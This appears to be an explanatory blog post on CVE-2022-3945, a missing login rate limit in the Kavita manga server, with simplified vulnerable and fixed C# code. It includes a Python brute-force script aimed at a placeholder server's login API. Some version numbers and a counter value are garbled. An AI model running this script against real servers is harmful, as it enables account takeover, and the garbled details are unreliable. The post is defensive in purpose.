CVE-2022-3945 - GitHub's Kavita Had a Major Authentication Loophole – Here’s How it Works and How it Was Fixed

---

What is CVE-2022-3945?

In late 2022, a security flaw was found in an open-source self-hosted manga server called Kavita. If you were using any version prior to .6..3, your server was vulnerable to what’s officially known as “Improper Restriction of Excessive Authentication Attempts”.

Let’s break that down: this vulnerability meant that Kavita didn’t properly limit how many times someone could try logging in with the wrong password. In plain words, attackers could keep hammering your server with password guesses, opening you up to brute-force attacks.

Why is This a Big Deal?

When a server allows unlimited login attempts, hackers can use automated tools to guess your password rapidly and repeatedly. Think of it like someone standing at your door with a list of thousands of keys, trying them all one after the other without you ever noticing. Eventually, they might just get in.

Brute-force attacks are one of the oldest tricks in the hacker playbook and are especially effective against accounts protected by weak or reused passwords.

Prior to the fix, the login logic in Kavita, simplified, looked something like this

// Before .6..3 - NO rate limiting
public IActionResult Login(string username, string password)
{
    var user = _userService.GetUserByUsername(username);
    if (user != null && user.Password == Hash(password))
    {
        // Successful login
        return Ok();
    }
    else
    {
        // Failed login, but user gets unlimited tries
        return Unauthorized();
    }
}

There is no tracking of whether a user fails multiple times, and no control over the frequency of requests.

How Could an Attacker Exploit This?

An attacker could write a simple script to hammer away at the login API. Here’s a basic python example for educational purposes only:

import requests

url = 'http://target-kavita-server.com/api/login';
attempts = 
with open('passwords.txt') as f:
    for password in f:
        data = {'username': 'victim', 'password': password.strip()}
        response = requests.post(url, json=data)
        attempts += 1
        print(f"Attempt #{attempts}: {password.strip()} - Status: {response.status_code}")
        if response.status_code == 200:
            print("Password found:", password)
            break

Given enough tries and a good password list, the attacker could eventually break into a user account.

How Was It Fixed in Kavita?

In version .6..3, Kavita’s devs introduced rate limiting. Now, if you fail the password check too many times in a short period, the app temporarily blocks or rate-limits your requests.

A modern (and safer) version of the login code would look like this (conceptual example)

public IActionResult Login(string username, string password)
{
    if (IsUserRateLimited(username))
    {
        return StatusCode(429); // Too Many Requests
    }
    // ... continue with login attempt ...
}

For Admins: Patch ASAP!

If you’re running Kavita and haven’t updated past version .6..3, update now. This is the recommended fix.

Reference Links

- Official Security Advisory (GHSA)
- NVD Details for CVE-2022-3945
- Kavita Changelog
- About Brute-Force Attacks (OWASP)

Summary

CVE-2022-3945 in Kavita was a risky flaw that could let hackers go wild with password guesses because of missing lock-outs and rate limiting. If you host this app, check your version right now and make sure you’re running the latest, patched release.

Stay secure, use strong and unique passwords, and always keep your apps updated!


*This post is exclusive content created for educational purposes, simplifying security concepts for everyone’s understanding.*

Timeline

Published on: 11/11/2022 12:15:00 UTC
Last modified on: 11/16/2022 15:34:00 UTC